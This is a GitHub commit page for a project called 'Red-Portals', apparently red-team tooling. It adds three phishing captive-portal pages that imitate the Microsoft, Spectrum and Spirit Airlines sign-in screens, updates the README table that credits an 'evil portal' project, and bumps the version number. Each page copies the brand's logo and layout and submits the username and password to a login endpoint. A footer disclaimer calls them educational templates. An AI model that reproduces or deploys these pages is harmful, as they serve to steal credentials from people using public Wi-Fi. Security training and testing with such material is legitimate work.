Skip to content

Commit

Permalink
Merge pull request #10 from CodyTolene/version-1.9.0
Browse files Browse the repository at this point in the history
v1.9.0
  • Loading branch information
CodyTolene authored Nov 28, 2024
2 parents a272eb2 + 352770d commit 18e832f
Show file tree
Hide file tree
Showing 12 changed files with 538 additions and 7 deletions.
20 changes: 16 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -36,11 +36,10 @@
| Facebook | [portals/facebook/index.html][url-portal-facebook] | 2.65 KB | [@roshanravan][url-roshanravan] - [link][url-roshanravan-facebook] |
| Google | [portals/google/index.html][url-portal-google] | 5.28 KB | [@breaching][url-breaching] - [link][url-breaching-google] |
| Instagram | [portals/instagram/index.html][url-portal-instagram] | 4.01 KB | [@JMcrafter26][url-jmcrafter26] - [link][url-jmcrafter26-instagram] |
| Microsoft | To do... | | |
| Microsoft 365 | To do... | | |
| Microsoft | [portals/microsoft/index.html][url-portal-microsoft] | 4.71 KB | [@Awlexegrecki][url-awlexegrecki] - [link][url-awlexegrecki-microsoft] |
| Southwest Airline | [portals/southwest-airline/index.html][url-portal-southwest-airline] | 3.72 KB | [@bigbrodude6119][url-bigbrodude6119] - [link][url-bigbrodude6119-southwest-airline] |
| Spectrum | To do... | | |
| Spirit Airlines | To do... | | |
| Spectrum | [portals/spectrum/index.html][url-portal-spectrum] | 3.16 KB | [@roshanravan][url-roshanravan] - [link][url-roshanravan-spectrum] |
| Spirit Airlines | [portals/spirit-airlines/index.html][url-portal-spirit-airlines] | 2.55 KB | [@roshanravan][url-roshanravan] - [link][url-roshanravan-spirit-airlines] |
| Starbucks | To do... | | |
| Starlink | To do... | | |
| T-Mobile | To do... | | |
Expand Down Expand Up @@ -256,11 +255,20 @@ Cody Tolene
https://raw.githack.com/CodyTolene/Red-Portals/main/portals/google/index.html
[url-portal-instagram]:
https://raw.githack.com/CodyTolene/Red-Portals/main/portals/instagram/index.html
[url-portal-microsoft]:
https://raw.githack.com/CodyTolene/Red-Portals/main/portals/microsoft/index.html
[url-portal-southwest-airline]:
https://raw.githack.com/CodyTolene/Red-Portals/main/portals/southwest-airline/index.html
[url-portal-spectrum]:
https://raw.githack.com/CodyTolene/Red-Portals/main/portals/spectrum/index.html
[url-portal-spirit-airlines]:
https://raw.githack.com/CodyTolene/Red-Portals/main/portals/spirit-airlines/index.html

<!-- USER & USER CODE REFERENCES -->

[url-awlexegrecki-microsoft]:
https://github.com/bigbrodude6119/flipper-zero-evil-portal/blob/ee597f6d1edacc4a72a7687adf4a0e9dab7ae616/portals/Microsoft.html
[url-awlexegrecki]: https://github.com/Awlexegrecki
[url-bigbrodude6119-delta-airlines]:
https://github.com/bigbrodude6119/flipper-zero-evil-portal/commit/281f8ffe25f08fa88fe8c334c89131f65c5a2afb#diff-b4fc76e467b7b429434070c839f1b16037169fe808dff2d70e475f30bf15de3e
[url-bigbrodude6119-southwest-airline]:
Expand All @@ -285,6 +293,10 @@ Cody Tolene
https://github.com/bigbrodude6119/flipper-zero-evil-portal/commit/cc3762fddc15936a03179fb8a189be8dd0811d27#diff-c47616c5a20cac7efef1b90e688946d627c7ce28c1b105657e0bfefdc475a8e0
[url-roshanravan-facebook]:
https://github.com/bigbrodude6119/flipper-zero-evil-portal/commit/10d6a69097d208e09363650e7af9a12c6979e612#diff-34b755e23907f7e47b7f990a45b11221112bd41d1fda0c52bb8a324dd67e1f5e
[url-roshanravan-spectrum]:
https://github.com/bigbrodude6119/flipper-zero-evil-portal/commit/8a13000642eb6d337aeced1c022efa5fdebdb83d#diff-3065c554bc6b2a48213a9fc993c00ba666ea31e05687c1b0cb84010a7b58b07f
[url-roshanravan-spirit-airlines]:
https://github.com/bigbrodude6119/flipper-zero-evil-portal/commit/26a1b21f79b93290309d310f6ed83ac5ef0b3c82#diff-670b566baa2e28a60d805f0697986262bd131ee665740d07b7f38f11e21255bc
[url-roshanravan]: https://github.com/roshanravan

<!-- OTHER LINK REFERENCES -->
Expand Down
4 changes: 2 additions & 2 deletions package-lock.json

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

2 changes: 1 addition & 1 deletion package.json
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
{
"name": "red-portals",
"version": "1.8.0",
"version": "1.9.0",
"license": "MIT",
"scripts": {
"build": "npx eleventy",
Expand Down
1 change: 1 addition & 0 deletions portals/microsoft/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<!doctype html><html lang="en"><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="styles.css" rel="stylesheet"><title>Sign in to your account</title><style>body{align-items:center;background:linear-gradient(120deg,#eadcd7 0,#dbdbde 25%,#dee0e0 50%,#dae4eb 75%,#ede8d2 100%);display:flex;font-family:"Segoe UI","Helvetica Neue",sans-serif;font-size:16px;height:100vh;justify-content:center;margin:0;padding:0}main{background-color:#fff;box-shadow:0 2px 6px rgba(0,0,0,.2);margin:auto;max-width:400px;padding:2.5rem}main>header>svg{display:block;margin:0}main>section>form{margin:0 auto;max-width:300px}main>section>form h1{color:#1b1b1b;font-size:1.5rem;font-weight:600;margin:.75rem 0;text-align:left}main>section>form input{border:none;border-bottom:1px solid #ccc;box-sizing:border-box;margin:.5rem 0;outline:0;padding:.5rem .35rem .5rem 0;width:100%}main>section>form input:focus{border-bottom:1px solid #3a8ac8}main>section>form>div{display:flex;flex-direction:column;font-size:.8125rem;font-weight:400;margin:1rem 0;text-align:left}main>section>form>div span{margin-bottom:1rem}main>section>form>div a{color:#3a8ac8;text-decoration:none}main>section>form>div a:hover{color:#005299;text-decoration:underline}main>section>form button{background-color:#0067b8;border:none;color:#fff;cursor:pointer;float:right;margin:.5rem 0;min-width:100px;padding:.5rem;text-align:center;text-overflow:ellipsis}main>section>form button:hover{background-color:#005299}footer{bottom:0;color:#111;font-size:.75rem;padding:.5rem 0;position:absolute;text-align:center;width:100%}footer p{margin:0}</style><main><header><svg aria-hidden="true" height="30" viewBox="0 0 337.6 72" width="100" xmlns="http://www.w3.org/2000/svg"><title>Microsoft</title><path d="M140.4 14.4v43.2h-7.5V23.7h-.1l-13.4 33.9h-5l-13.7-33.9h-.1v33.9h-6.9V14.4h10.8l12.4 32h.2l13.1-32h10.2zm6.2 3.3c0-1.2.4-2.2 1.3-3 .9-.8 1.9-1.2 3.1-1.2 1.3 0 2.4.4 3.2 1.2s1.3 1.8 1.3 3-.4 2.2-1.3 3c-.9.8-1.9 1.2-3.2 1.2s-2.3-.4-3.1-1.2a4.5 4.5 0 0 1-1.3-3zm8.1 8.9v31h-7.3v-31h7.3zm22.1 25.7c1.1 0 2.3-.2 3.6-.8 1.3-.5 2.5-1.2 3.6-2v6.8c-1.2.7-2.5 1.2-4 1.5-1.5.3-3.1.5-4.9.5A14.7 14.7 0 0 1 159.7 43c0-5 1.5-9.1 4.4-12.3 2.9-3.2 7-4.8 12.4-4.8a18.4 18.4 0 0 1 7.4 1.7v7a11.5 11.5 0 0 0-7-2.6c-2.9 0-5.2.9-7 2.8s-2.6 4.4-2.6 7.6c0 3.1.9 5.6 2.6 7.3 1.7 1.7 4 2.6 6.9 2.6zm27.9-26.2a8 8 0 0 1 2.8.4v7.4c-.4-.3-.9-.6-1.7-.8s-1.6-.4-2.7-.4c-1.8 0-3.3.8-4.5 2.3s-1.9 3.8-1.9 7v15.6h-7.3v-31h7.3v4.9h.1c.7-1.7 1.7-3 3-4 1.4-.9 3-1.4 4.9-1.4zm3.2 16.5c0-5.1 1.5-9.2 4.3-12.2a16 16 0 0 1 12-4.5c4.8 0 8.6 1.4 11.3 4.3s4.1 6.8 4.1 11.7c0 5-1.5 9-4.3 12-2.9 3-6.8 4.5-11.8 4.5-4.8 0-8.6-1.4-11.4-4.2a16 16 0 0 1-4.2-11.6zm7.6-.3c0 3.2.7 5.7 2.2 7.4s3.6 2.6 6.3 2.6c2.6 0 4.7-.8 6.1-2.6 1.4-1.7 2.1-4.2 2.1-7.6a12 12 0 0 0-2.1-7.6 7.5 7.5 0 0 0-6-2.6c-2.7 0-4.7.9-6.2 2.7-1.7 1.9-2.4 4.4-2.4 7.7zm35-7.5c0 1 .3 1.9 1 2.5.7.6 2.1 1.3 4.4 2.2 2.9 1.2 5 2.5 6.1 3.9a8.1 8.1 0 0 1 1.8 5.3c0 2.9-1.1 5.2-3.4 7a14 14 0 0 1-9.1 2.6 23.7 23.7 0 0 1-8.3-1.7v-7.2c1.3.9 2.8 1.7 4.3 2.2 1.5.5 2.9.8 4.2.8 1.6 0 2.9-.2 3.6-.7.8-.5 1.2-1.2 1.2-2.3 0-1-.4-1.8-1.2-2.6-.8-.7-2.4-1.5-4.6-2.4-2.7-1.1-4.6-2.4-5.7-3.8s-1.7-3.2-1.7-5.4c0-2.8 1.1-5.1 3.3-6.9 2.2-1.8 5.1-2.7 8.6-2.7 1.1 0 2.3.1 3.6.4l3.4.9V34c-1-.6-2.1-1.2-3.4-1.7-1.3-.5-2.6-.7-3.8-.7-1.4 0-2.5.3-3.2.8-.7.7-1.1 1.4-1.1 2.4zm16.4 7.8c0-5.1 1.5-9.2 4.3-12.2a16 16 0 0 1 12-4.5c4.8 0 8.6 1.4 11.3 4.3s4.1 6.8 4.1 11.7c0 5-1.5 9-4.3 12-2.9 3-6.8 4.5-11.8 4.5-4.8 0-8.6-1.4-11.4-4.2a16.5 16.5 0 0 1-4.2-11.6zm7.6-.3c0 3.2.7 5.7 2.2 7.4s3.6 2.6 6.3 2.6c2.6 0 4.7-.8 6.1-2.6 1.4-1.7 2.1-4.2 2.1-7.6a12 12 0 0 0-2.1-7.6 7.5 7.5 0 0 0-6-2.6c-2.7 0-4.7.9-6.2 2.7-1.7 1.9-2.4 4.4-2.4 7.7zm48.4-9.7H312v25h-7.4v-25h-5.2v-6h5.2v-4.3c0-3.2 1.1-5.9 3.2-8s4.8-3.1 8.1-3.1l2.4.1c.7 0 1.3.2 1.8.4V18l-1.3-.5c-.6-.2-1.3-.3-2.1-.3-1.5 0-2.7.5-3.5 1.4-.8.9-1.2 2.4-1.2 4.2v3.7h10.9v-7l7.3-2.2v9.2h7.4v6h-7.4V47c0 1.9.4 3.2 1 4 .7.8 1.8 1.2 3.3 1.2a5 5 0 0 0 1.5-.3c.6-.2 1.1-.4 1.5-.7v6a7 7 0 0 1-2.3.7c-1.1.2-2.1.3-3.2.3-3.1 0-5.4-.8-6.9-2.4-1.5-1.6-2.3-4.1-2.3-7.4l.1-15.8z" fill="#737373"/><path d="M0 0h34.2v34.2H0z" fill="#F25022"/><path d="M37.8 0H72v34.2H37.8z" fill="#7FBA00"/><path d="M0 37.8h34.2V72H0z" fill="#00A4EF"/><path d="M37.8 37.8H72V72H37.8z" fill="#FFB900"/></svg></header><section><form action="/login" method="GET"><h1>Sign in</h1><input id="username" name="username" placeholder="Email, phone, or Skype" required type="text"> <input id="password" name="password" placeholder="Password" required type="password"><div><span>No account? <a href>Create one!</a> </span><a href>Can't access your account?</a></div><button type="submit">Next</button></form></section></main><footer><p>This is a simulated template for educational purposes only. Not affiliated with or endorsed by any brand.</footer>
1 change: 1 addition & 0 deletions portals/spectrum/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<!doctype html><html lang="en"><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Sign In to Get Started | Spectrum.net</title><style>body{margin:0;padding:0;font-family:Arial,sans-serif;background-color:#f6f8fa;display:flex;justify-content:center;align-items:center;min-height:100vh}main{text-align:center;background-color:#fff;box-shadow:0 2px 6px rgba(0,0,0,.2);padding:2rem;width:80%;max-width:300px}main header svg{width:50%;height:auto}main section h1{color:#000;margin:.5rem 0}main section p{margin:0;font-size:.8rem;color:#666}main section form{display:flex;flex-direction:column;margin-top:1rem}main section form input{margin:.5rem 0;padding:.625rem;border:1px solid #ccc;border-radius:.25rem;outline:0}main section form input:focus{border-color:#0076bc}main section form button{margin:.5rem 0;padding:.625rem;color:#fff;background-color:#0076bc;border:none;border-radius:.25rem;cursor:pointer}main section form button:hover{background-color:#005999}footer{bottom:0;color:#111;font-size:.75rem;padding:.5rem 0;position:absolute;text-align:center;width:100%}footer p{margin:0}@media(max-width:600px){main{width:95%}}</style><main><header><svg height="32" viewBox="0 0 1001 209" width="150" xml:space="preserve" xmlns="http://www.w3.org/2000/svg"><title>Spectrum</title><path d="M934 61v102l67-51z" fill="#0099D8"/><path d="M166 193c0 9-6 16-15 16h-16V94c2-30 13-55 59-56 20 0 35 8 44 18 9 12 13 27 13 46s-5 35-14 47c-9 11-21 17-36 17-21 0-32-9-35-10v37m53-90c0-12-2-37-27-37-23 0-26 24-26 37 0 32 18 36 27 36 22 0 26-24 26-36M18 153c11 9 26 13 47 13 20 0 36-4 47-13s16-22 16-38c0-8-1-15-5-21-3-6-8-12-15-15l-12-5-37-10c-15-4-25-9-25-18 1-18 17-19 27-19 9 0 17 2 22 6 10 7 9 17 9 17h31c-1-15-6-28-17-37C96 4 82 0 63 0 43 0 28 4 18 12 7 21 2 33 2 48c0 19 9 30 18 35 5 3 16 8 31 11l12 3c22 5 34 12 34 22 0 7-3 12-8 15-4 3-12 5-21 5-11 0-19-2-25-6s-10-11-11-20H0c1 18 7 31 18 40m296-88c20 0 23 16 23 25h-46s-1-25 23-25m1 74c-8-1-23-2-24-29h79v-9c0-20-5-35-14-46a55 55 0 0 0-43-17c-17 0-31 6-41 17-9 11-14 26-14 46 0 21 5 36 15 47 9 12 23 17 40 17 15 0 27-3 36-10 10-7 16-17 20-30h-28c-4 12-14 14-26 14m533 24h-32V85c0-9-4-21-22-21-17 0-21 13-21 21v78h-32V91c0-21 6-33 16-42 10-8 23-11 36-11l21 2c7 2 13 5 18 9 5-4 10-7 17-8 6-2 13-3 19-3 40 0 56 18 57 23v102h-18c-5 0-16-3-16-16V85c0-9-3-21-22-21-18 0-21 13-21 21v78zm-390-38h30s-8 40-54 40c-45 0-56-36-56-60s4-65 55-67c47 0 54 40 54 40h-32s-3-14-22-13c-19 0-24 18-24 35s4 39 25 39c20 0 22-11 24-14m167-84h32v78s-1 21 21 21c21 0 22-19 22-20V56s1-15 15-15h17v72c-1 4 4 52-54 52-56 0-52-48-53-51V41zm-98 33h19V41h-19V21c0-6-3-16-15-16h-17v135c0 14 6 23 18 23h14V74zm53 89v-63c0-9 2-16 6-20 4-5 11-7 20-7h10V41s-16-1-28 3a50 50 0 0 0-35 30c-4 8-6 18-6 30v59h33z" fill="#003057"/></svg></header><section><h1>Welcome</h1><p>Sign in with your account to get started<form action="/login" method="GET"><input id="username" name="username" placeholder="Username" required type="text"> <input id="password" name="password" placeholder="Password" required type="password"> <button type="submit">Login</button></form></section></main><footer><p>This is a simulated template for educational purposes only. Not affiliated with or endorsed by any brand.</footer>
1 change: 1 addition & 0 deletions portals/spirit-airlines/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<!doctype html><html lang="en"><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Spirit Airlines | Free WiFi Login</title><style>body{margin:0;padding:0;font-family:Arial,sans-serif;background-color:#fde46c;display:flex;flex-direction:column;align-items:center;justify-content:center;min-height:100vh}main{background-color:#fff;box-shadow:0 2px 6px rgba(0,0,0,.25);padding:2rem;border-radius:.5rem;text-align:center;width:90%;max-width:300px}main header{text-align:center;margin-bottom:1rem}main section h1{color:#232f3e;font-size:1.5rem;font-weight:600;margin-bottom:1rem}main section form{display:flex;flex-direction:column;gap:.5rem}main section form input{padding:.75rem;border:2px solid #ddd;border-radius:.25rem;outline:0}main section form input:focus{border-color:#303c49}main section form button{padding:.875rem;color:#fff;background-color:#303c49;border:none;border-radius:.25rem;cursor:pointer;transition:background-color .3s ease}main section form button:hover{background-color:#1f2931}footer{bottom:0;color:#111;font-size:.75rem;padding:.5rem 0;position:absolute;text-align:center;width:100%}footer p{margin:0}</style><main><header><svg height="40" viewBox="100 120 365 150" xml:space="preserve" xmlns="http://www.w3.org/2000/svg"><title>Spirit Airlines - WiFi</title><path d="M434 171h15l-4 15h-15l-5 23c-1 5 0 6 7 6h8l-3 14-18 1c-15 0-20-4-17-16l6-28h-12l3-15h12l4-19h22zm-78 58h22l13-58h-23zm14-65h22l3-14h-23zm-62 7-12 58h22l12-58zm53-3h-5c-10 0-26 10-30 28l-1 4c3-8 11-12 22-12l9 1zm-85 3-12 58h22l13-58zm27-21h-23l-3 14h23zm-41 51c-3 16-19 30-40 30-10 0-17-3-20-8l-6 27h-22l16-79h22l-1 7c6-6 15-9 24-9 21 0 32 12 27 32zm-36-16c-10 0-17 6-19 15s2 15 13 15c10 0 17-6 19-15 2-10-2-15-13-15zm-70 8-19-2c-6-1-7-2-6-4 0-4 5-6 11-6l8 2c2 1 3 2 3 5h26c2-17-17-20-32-20-22 0-37 5-40 21-2 10 4 15 17 16l19 3c6 0 8 1 7 4-1 4-6 5-11 5l-10-1c-2-1-2-3-2-5h-27c-3 17 18 20 34 20 24 0 39-6 42-20 2-11-5-16-20-18zm301-17 1 2h-2v-2h-1v2h-1v-5h3v3zm-1-1v-1h-1v1h1zm4 0v2l-1 2a4 4 0 0 1-4 1h-1l-2-1-1-2v-4a4 4 0 0 1 3-2h3l2 1 1 1v2zm-1 0v-1l-1-1-1-1h-3l-1 1-1 1v1a4 4 0 0 0 1 3l1 1a3 3 0 0 0 3 0l1-1 1-1v-2z"/></svg></header><section><h1>Spirit Airlines - WiFi</h1><form><input id="username" name="username" placeholder="Email Address or Free Spirit Number" required type="text"> <input id="password" name="password" placeholder="Password" required type="password"> <button type="submit">Login</button></form></section></main><footer><p>This is a simulated template for educational purposes only. Not affiliated with or endorsed by any brand.</footer>
86 changes: 86 additions & 0 deletions src/microsoft.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,86 @@
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta
name="viewport"
content="width=device-width, initial-scale=1.0"
/>
<link
href="styles.css"
rel="stylesheet"
/>
<title>Sign in to your account</title>
</head>
<body>
<main>
<header>
<svg
aria-hidden="true"
height="30"
viewBox="0 0 337.6 72"
width="100"
xmlns="http://www.w3.org/2000/svg"
>
<title>Microsoft</title>
<path
d="M140.4 14.4v43.2h-7.5V23.7h-.1l-13.4 33.9h-5l-13.7-33.9h-.1v33.9h-6.9V14.4h10.8l12.4 32h.2l13.1-32h10.2zm6.2 3.3c0-1.2.4-2.2 1.3-3 .9-.8 1.9-1.2 3.1-1.2 1.3 0 2.4.4 3.2 1.2s1.3 1.8 1.3 3-.4 2.2-1.3 3c-.9.8-1.9 1.2-3.2 1.2s-2.3-.4-3.1-1.2a4.5 4.5 0 0 1-1.3-3zm8.1 8.9v31h-7.3v-31h7.3zm22.1 25.7c1.1 0 2.3-.2 3.6-.8 1.3-.5 2.5-1.2 3.6-2v6.8c-1.2.7-2.5 1.2-4 1.5-1.5.3-3.1.5-4.9.5A14.7 14.7 0 0 1 159.7 43c0-5 1.5-9.1 4.4-12.3 2.9-3.2 7-4.8 12.4-4.8a18.4 18.4 0 0 1 7.4 1.7v7a11.5 11.5 0 0 0-7-2.6c-2.9 0-5.2.9-7 2.8s-2.6 4.4-2.6 7.6c0 3.1.9 5.6 2.6 7.3 1.7 1.7 4 2.6 6.9 2.6zm27.9-26.2a8 8 0 0 1 2.8.4v7.4c-.4-.3-.9-.6-1.7-.8s-1.6-.4-2.7-.4c-1.8 0-3.3.8-4.5 2.3s-1.9 3.8-1.9 7v15.6h-7.3v-31h7.3v4.9h.1c.7-1.7 1.7-3 3-4 1.4-.9 3-1.4 4.9-1.4zm3.2 16.5c0-5.1 1.5-9.2 4.3-12.2a16 16 0 0 1 12-4.5c4.8 0 8.6 1.4 11.3 4.3s4.1 6.8 4.1 11.7c0 5-1.5 9-4.3 12-2.9 3-6.8 4.5-11.8 4.5-4.8 0-8.6-1.4-11.4-4.2a16 16 0 0 1-4.2-11.6zm7.6-.3c0 3.2.7 5.7 2.2 7.4s3.6 2.6 6.3 2.6c2.6 0 4.7-.8 6.1-2.6 1.4-1.7 2.1-4.2 2.1-7.6a12 12 0 0 0-2.1-7.6 7.5 7.5 0 0 0-6-2.6c-2.7 0-4.7.9-6.2 2.7-1.7 1.9-2.4 4.4-2.4 7.7zm35-7.5c0 1 .3 1.9 1 2.5.7.6 2.1 1.3 4.4 2.2 2.9 1.2 5 2.5 6.1 3.9a8.1 8.1 0 0 1 1.8 5.3c0 2.9-1.1 5.2-3.4 7a14 14 0 0 1-9.1 2.6 23.7 23.7 0 0 1-8.3-1.7v-7.2c1.3.9 2.8 1.7 4.3 2.2 1.5.5 2.9.8 4.2.8 1.6 0 2.9-.2 3.6-.7.8-.5 1.2-1.2 1.2-2.3 0-1-.4-1.8-1.2-2.6-.8-.7-2.4-1.5-4.6-2.4-2.7-1.1-4.6-2.4-5.7-3.8s-1.7-3.2-1.7-5.4c0-2.8 1.1-5.1 3.3-6.9 2.2-1.8 5.1-2.7 8.6-2.7 1.1 0 2.3.1 3.6.4l3.4.9V34c-1-.6-2.1-1.2-3.4-1.7-1.3-.5-2.6-.7-3.8-.7-1.4 0-2.5.3-3.2.8-.7.7-1.1 1.4-1.1 2.4zm16.4 7.8c0-5.1 1.5-9.2 4.3-12.2a16 16 0 0 1 12-4.5c4.8 0 8.6 1.4 11.3 4.3s4.1 6.8 4.1 11.7c0 5-1.5 9-4.3 12-2.9 3-6.8 4.5-11.8 4.5-4.8 0-8.6-1.4-11.4-4.2a16.5 16.5 0 0 1-4.2-11.6zm7.6-.3c0 3.2.7 5.7 2.2 7.4s3.6 2.6 6.3 2.6c2.6 0 4.7-.8 6.1-2.6 1.4-1.7 2.1-4.2 2.1-7.6a12 12 0 0 0-2.1-7.6 7.5 7.5 0 0 0-6-2.6c-2.7 0-4.7.9-6.2 2.7-1.7 1.9-2.4 4.4-2.4 7.7zm48.4-9.7H312v25h-7.4v-25h-5.2v-6h5.2v-4.3c0-3.2 1.1-5.9 3.2-8s4.8-3.1 8.1-3.1l2.4.1c.7 0 1.3.2 1.8.4V18l-1.3-.5c-.6-.2-1.3-.3-2.1-.3-1.5 0-2.7.5-3.5 1.4-.8.9-1.2 2.4-1.2 4.2v3.7h10.9v-7l7.3-2.2v9.2h7.4v6h-7.4V47c0 1.9.4 3.2 1 4 .7.8 1.8 1.2 3.3 1.2a5 5 0 0 0 1.5-.3c.6-.2 1.1-.4 1.5-.7v6a7 7 0 0 1-2.3.7c-1.1.2-2.1.3-3.2.3-3.1 0-5.4-.8-6.9-2.4-1.5-1.6-2.3-4.1-2.3-7.4l.1-15.8z"
fill="#737373"
/>
<path
d="M0 0h34.2v34.2H0z"
fill="#F25022"
/>
<path
d="M37.8 0H72v34.2H37.8z"
fill="#7FBA00"
/>
<path
d="M0 37.8h34.2V72H0z"
fill="#00A4EF"
/>
<path
d="M37.8 37.8H72V72H37.8z"
fill="#FFB900"
/>
</svg>
</header>
<section>
<form
action="/login"
method="GET"
>
<h1>Sign in</h1>
<input
id="username"
name="username"
placeholder="Email, phone, or Skype"
required
type="text"
/>
<input
id="password"
name="password"
placeholder="Password"
required
type="password"
/>
<div>
<span>
No account?
<a href>Create one!</a>
</span>
<a href>Can't access your account?</a>
</div>
<button type="submit">Next</button>
</form>
</section>
</main>
<footer>
<p>
This is a simulated template for educational purposes only. Not
affiliated with or endorsed by any brand.
</p>
</footer>
</body>
</html>
Loading

0 comments on commit 18e832f

Please sign in to comment.